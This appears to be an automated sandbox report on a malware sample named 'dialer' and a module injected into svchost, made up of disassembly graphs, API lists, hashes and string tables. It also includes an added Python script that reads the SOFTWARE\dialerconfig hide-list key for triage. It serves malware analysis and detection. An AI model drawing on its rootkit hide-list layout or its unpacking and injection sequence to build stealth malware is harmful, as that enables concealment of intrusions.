                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                              • String ID: 0$X$\BaseNamedObjects\tolfdedwfkhaxzps$`
                                                              • API String ID: 780471329-127241884
                                                              • Opcode ID: ca329b8358bff8b4e8ff36211ae56e3d8ec4941fef26ae660c8b814acf6b5e73
                                                              • Instruction ID: b7a8635e81b479a36268048e01487e4521078d4d17ad74f469b434e1b5bcd61f
                                                              • Opcode Fuzzy Hash: ca329b8358bff8b4e8ff36211ae56e3d8ec4941fef26ae660c8b814acf6b5e73
                                                              • Instruction Fuzzy Hash: 1D1259B2618B8081E762CB1AF8453EA77A4F789794F418215EBAC57BF5DF78C189C700

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                              • String ID:
                                                              • API String ID: 2643109117-0
                                                              • Opcode ID: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                              • Instruction ID: 1a1351f792f9bf4967cc34d0f53f5ff7a53c0879af89bef87e4895d8dd39205b
                                                              • Opcode Fuzzy Hash: 586022b6e751a55053106be641e00a3b8c3e9c35461d7db68985742fa9914fcd
                                                              • Instruction Fuzzy Hash: 9851F1F1615A4485FA16EF27F9A47EA27A1BB8C7D0F449125FB4E873B2DF3884958300

                                                              Control-flow Graph

                                                              APIs
                                                              • VirtualQuery.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                              • VirtualProtect.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                              • memcpy.MSVCRT ref: 0000000140001CE0
                                                              • GetLastError.KERNEL32(?,?,?,?,0000000140007E68,0000000140007E68,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                              • API String ID: 2595394609-2123141913
                                                              • Opcode ID: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                              • Instruction ID: fdcea6415f7229f01c984092642b28fb5a36d70c662bb5773ed37d7d1973f443
                                                              • Opcode Fuzzy Hash: 189629d51215e3dd95598548a56e1a7d079b1a4a02dcbf9889c089ac4568ca2a
                                                              • Instruction Fuzzy Hash: D64132B1201A4486FA26DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 533 14000220b-140002212 LeaveCriticalSection 531->533 534 14000212e-14000213c 531->534 535 140002272-140002280 532->535 536 140002223-14000222d 532->536 533->532 537 14000214d-140002159 TlsGetValue GetLastError 534->537 538 140002241-140002263 DeleteCriticalSection 536->538 539 14000222f 536->539 541 14000215b-14000215e 537->541 542 140002140-140002147 537->542 538->535 540 140002230-14000223f free 539->540 540->538 540->540 541->542 543 140002160-14000216d 541->543 542->533 542->537 543->542
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                              • String ID:
                                                              • API String ID: 3326252324-0
                                                              • Opcode ID: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                              • Instruction ID: afb0d6c5a9c099b73ff3c6c79e798d45aa650c7d30c6adae1a01f4103a689b7c
                                                              • Opcode Fuzzy Hash: 3a7d6074dc52b44e327b1ce3a8e74d0e8058649150b3659853f697306d85c7d1
                                                              • Instruction Fuzzy Hash: 4F21B3B1305A11D2FA6BDB53F9583E82364BB6CBD0F444121FF5A576B4DB798986C300

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 556 140001f23-140001f2d 552->556 557 140001ed3-140001ee2 signal 552->557 554 140001eb5-140001eba 553->554 555 140001efb-140001f0a call 140006c20 553->555 554->548 561 140001ec0 554->561 555->556 566 140001f0c-140001f10 555->566 559 140001f43-140001f45 556->559 560 140001f2f-140001f3f 556->560 557->556 562 140001ee4-140001ee8 557->562 559->548 560->559 561->556 563 140001eea-140001ef9 signal 562->563 564 140001f4e-140001f53 562->564 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CCG
                                                              • API String ID: 0-1584390748
                                                              • Opcode ID: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                              • Instruction ID: fad6180ef962ac1bf57e0d6b6b3de3a82f7bb0a4b16ac2ded5004f5be79f4ed3
                                                              • Opcode Fuzzy Hash: 5701baccf9870bc39b117922084b810e6e0275f78b30b514fbc6538b1739fc18
                                                              • Instruction Fuzzy Hash: 13214CB2B0150642FA77DA2BF5903F91192ABCC7E4F258536FF59473F5DE3888828241

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 570 140006670-14000668c 571 1400066bb-1400066df call 140006660 570->571 572 14000668e 570->572 577 140006906-140006918 571->577 579 1400066e5-1400066f9 call 140006660 571->579 573 140006695-14000669a 572->573 575 1400066a0-1400066a3 573->575 575->577 578 1400066a9-1400066af 575->578 578->575 580 1400066b1-1400066b6 578->580 583 14000670f-140006721 579->583 580->577 584 140006703-14000670d 583->584 585 140006723-14000673d call 140006660 583->585 584->583 586 140006765-140006768 584->586 590 14000673f-140006761 call 140006660 * 2 585->590 591 140006700 585->591 586->577 589 14000676e-14000679a call 140006660 malloc 586->589 596 1400068fc 589->596 597 1400067a0-1400067a2 589->597 590->584 603 140006763 590->603 591->584 596->577 597->596 599 1400067a8-1400067d8 call 140006660 * 2 597->599 606 1400067e0-1400067f7 599->606 603->589 607 1400068d3-1400068db 606->607 608 1400067fd-140006803 606->608 611 1400068e6-1400068f4 607->611 612 1400068dd-1400068e0 607->612 609 140006852 608->609 610 140006805-140006823 call 140006660 608->610 615 140006857-140006899 call 140006660 * 2 609->615 618 140006830-14000684e 610->618 611->573 614 1400068fa 611->614 612->606 612->611 614->577 623 1400068c8-1400068cf 615->623 624 14000689b 615->624 618->618 620 140006850 618->620 620->615 623->607 625 1400068a0-1400068ac 624->625 626 1400068c3 625->626 627 1400068ae-1400068c1 625->627 626->623 627->625 627->626
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: \BaseNamedObjects\kcomrvhyxww$czIt$zvIt
                                                              • API String ID: 2803490479-4156244989
                                                              • Opcode ID: 81b7f587ddda00cfd30067675353acb84889c5bcd98c01046e2fbf71dfc3e994
                                                              • Instruction ID: 21cb044f4a7c25217858771e85b064502aacfafeff9637893254959b2351a677
                                                              • Opcode Fuzzy Hash: 81b7f587ddda00cfd30067675353acb84889c5bcd98c01046e2fbf71dfc3e994
                                                              • Instruction Fuzzy Hash: 8C7182B67106148BE756EF26F500BAA3692F38CBDCF044214FF4A677A5EB34D8509750

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 628 140001880-14000189c 629 1400018a2-1400018f9 call 140002420 call 140002660 628->629 630 140001a0f-140001a1f 628->630 629->630 635 1400018ff-140001910 629->635 636 140001912-14000191c 635->636 637 14000193e-140001941 635->637 639 14000194d-140001954 636->639 640 14000191e-140001929 636->640 638 140001943-140001947 637->638 637->639 638->639 642 140001a20-140001a26 638->642 643 140001956-140001961 639->643 644 14000199e-1400019a6 639->644 640->639 641 14000192b-14000193a 640->641 641->637 647 140001b87-140001b98 call 140001d40 642->647 648 140001a2c-140001a37 642->648 645 140001970-14000199c call 140001ba0 643->645 644->630 646 1400019a8-1400019c1 644->646 645->644 652 1400019df-1400019e7 646->652 648->644 649 140001a3d-140001a5f 648->649 655 140001a7d-140001a97 649->655 653 1400019e9-140001a0d VirtualProtect 652->653 654 1400019d0-1400019dd 652->654 653->654 654->630 654->652 658 140001b74-140001b82 call 140001d40 655->658 659 140001a9d-140001afa 655->659 658->647 665 140001b22-140001b26 659->665 666 140001afc-140001b0e 659->666 669 140001b2c-140001b30 665->669 670 140001a70-140001a77 665->670 667 140001b5c-140001b6c 666->667 668 140001b10-140001b20 666->668 667->658 672 140001b6f call 140001d40 667->672 668->665 668->667 669->670 671 140001b36-140001b57 call 140001ba0 669->671 670->644 670->655 671->667 672->658
                                                              APIs
                                                              • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                              • API String ID: 544645111-395989641
                                                              • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                              • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                              • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                              • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 676 140001800-140001810 677 140001812-140001822 676->677 678 140001824 676->678 679 14000182b-140001867 call 140002290 fprintf 677->679 678->679
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: fprintf
                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                              • API String ID: 383729395-3474627141
                                                              • Opcode ID: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                              • Instruction ID: a3faaabf629437a0964f4525ace193ebe5e29d4333283446a04dc1db5ce24221
                                                              • Opcode Fuzzy Hash: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                              • Instruction Fuzzy Hash: 47F09671A14A8482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 682 14000219e-1400021a5 683 140002272-140002280 682->683 684 1400021ab-1400021c2 EnterCriticalSection 682->684 685 140002265-14000226c LeaveCriticalSection 684->685 686 1400021c8-1400021d6 684->686 685->683 687 1400021e9-1400021f5 TlsGetValue GetLastError 686->687 688 1400021f7-1400021fa 687->688 689 1400021e0-1400021e7 687->689 688->689 690 1400021fc-140002209 688->690 689->685 689->687 690->689
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003F.00000002.3066845591.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003F.00000002.3066680755.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067022937.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067180435.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 0000003F.00000002.3067378362.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                              • String ID:
                                                              • API String ID: 682475483-0
                                                              • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                              • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                              • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                              • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300

                                                              Execution Graph

                                                              Execution Coverage:56.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:87.5%
                                                              Total number of Nodes:8
                                                              Total number of Limit Nodes:1

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000040.00000002.3066852301.0000000140840000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000040.00000002.3066679529.0000000140000000.00000004.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.00000001404DC000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.0000000140500000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.0000000140503000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.000000014078B000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3066852301.000000014080D000.00000040.00000400.00020000.00000000.sdmp
                                                              • Associated: 00000040.00000002.3071777752.0000000140847000.00000004.00000400.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 1941872368-0
                                                              • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                              • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                              • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                              • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                              Execution Graph

                                                              Execution Coverage:0.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:2
                                                              execution_graph (rendered graph data not reproduced; the call structure it encodes is summarised here)
                                                              • 26a8799273c → 26a8799276a, which loops through 26a87992858 (LoadLibraryA) until it continues at 26a879928d4
                                                              • 26a879c1abc → 26a879c1628 once, then a loop at 26a879c1acb alternating between 26a879c1ad2 (Sleep, SleepEx) and 26a879c1598 (StrCmpIW, StrCmpW)
                                                              • 26a879c1628 → GetProcessHeap, then 26a879c1268 (GetProcessHeap, 2 API calls via 26a879d6168) four times, then RegOpenKeyExW on the root key at 26a879c168e; on failure it returns through 26a879c18a6, on success it opens eight subkeys in turn (RegOpenKeyExW at 26a879c16c0, 26a879c16ff, 26a879c173a, 26a879c1775, 26a879c17b0, 26a879c17eb, 26a879c1826, 26a879c1861, each followed by RegCloseKey)
                                                              • four of those subkeys are read through 26a879c12bc (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapFree, lstrlenW, StrCpyW and the StrCmpIW/StrCmpW helper 26a879c152c, 13 API calls), the other four through 26a879c104c (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapFree, RegCloseKey, 5 API calls)

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 8b3f40dc757b03efebebe1ec2b21d8ee4b81ef9a05be350be4598fcd48a0c6e5
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 99715D76310E1086EF90DF66E89869D3BB4FB85B88F405111EE4E67B68EF3AC444CB45
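The function above opens SOFTWARE\dialerconfig and then, one after another, the eight subkeys named in its string table (paths, pid, process_names, service_names, startup, tcp_local, tcp_remote, udp), enumerating the values under each with RegQueryInfoKeyW/RegEnumValueW; that is the hide-list layout the open-source r77 rootkit keeps under its own config key. The Python below is an added triage helper, not code from the sample or from the report. It parses a `reg export` of the key offline (the export text embedded in it is constructed, with placeholder values) and, on a Windows host, can read the key live. The hive (HKLM and HKCU are tried, in both WOW64 views) and the value types (REG_SZ for names and paths, REG_DWORD for pids and ports) are assumptions.

```python
"""Offline / live triage of the SOFTWARE\\dialerconfig hide-list key.

Added example, not code from the sample or from the report. Key and subkey
names come from the string table above; hive and value types are assumed.
"""
import re

CONFIG_KEY = r"SOFTWARE\dialerconfig"
# Eight subkeys from the string table (order used for reporting).
CONFIG_SUBKEYS = ("paths", "pid", "process_names", "service_names",
                  "startup", "tcp_local", "tcp_remote", "udp")

_KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
_VAL_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')


def _decode_reg_data(data: str):
    """Decode the value syntax written by `reg export` (.reg version 5.00)."""
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if data.lower().startswith("dword:"):
        return int(data[6:], 16)
    return data                      # hex(...) blobs etc. are left as written


def parse_reg_export(text: str) -> dict:
    """Parse a .reg export into {subkey: {value_name: data}} for the config key."""
    config, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            path = m.group("path")
            idx = path.lower().find(CONFIG_KEY.lower())
            if idx < 0:
                current = None
                continue
            rest = path[idx + len(CONFIG_KEY):].strip("\\").lower()
            current = rest or None   # the root key itself carries no hide-list values
            if current:
                config.setdefault(current, {})
            continue
        m = _VAL_RE.match(line)
        if m and current:
            name = "@" if m.group("default") else m.group("name")
            config[current][name] = _decode_reg_data(m.group("data"))
    return config


def hide_list(config: dict) -> list:
    """Flatten to (subkey, value_name, data) tuples in CONFIG_SUBKEYS order."""
    return [(sub, name, data)
            for sub in CONFIG_SUBKEYS if sub in config
            for name, data in config[sub].items()]


def read_live_config(hives=("HKLM", "HKCU")) -> dict:
    """Windows only: read the key from the live registry in both WOW64 views."""
    import winreg                                   # lazy import keeps the parser portable
    roots = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    result = {}
    for hive in hives:
        for view, label in ((winreg.KEY_WOW64_64KEY, "64"), (winreg.KEY_WOW64_32KEY, "32")):
            try:
                root = winreg.OpenKey(roots[hive], CONFIG_KEY, 0, winreg.KEY_READ | view)
            except OSError:
                continue                            # key absent in this hive/view (or hidden)
            with root:
                found = {}
                for sub in CONFIG_SUBKEYS:
                    try:
                        key = winreg.OpenKey(root, sub, 0, winreg.KEY_READ | view)
                    except OSError:
                        continue
                    with key:
                        values, i = {}, 0
                        while True:
                            try:
                                name, data, _ = winreg.EnumValue(key, i)
                            except OSError:     # ERROR_NO_MORE_ITEMS
                                break
                            values[name] = data
                            i += 1
                    found[sub] = values
                result[f"{hive}:{label}-bit"] = found
    return result


# Constructed .reg export with placeholder values (not indicators from this sample).
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig]

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\pid]
"1"=dword:00001a2c

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\process_names]
"1"="hidden.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\paths]
"1"="C:\\ProgramData\\example"

[HKEY_LOCAL_MACHINE\SOFTWARE\dialerconfig\tcp_remote]
"1"=dword:00000e1f
"""

if __name__ == "__main__":
    for sub, name, data in hide_list(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{sub:14s} {name:>4s} = {data!r}")
```

Because the sample hooks the registry enumeration functions, a live read from a process the module has been injected into may simply not see the key; prefer `read_live_config()` from a process started before the infection took hold, or export the SOFTWARE hive file from a clean boot and run `parse_reg_export()` on it.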

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: bbd561d3a30add4c1150a9458a01d63078364739115671f5aea34e55c8598808
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 0211807261064182FFE0AB22F90D35D36A4A7D4385FD04124EA0EA3696EFBBC0849F13

                                                              Control-flow Graph

                                                              APIs
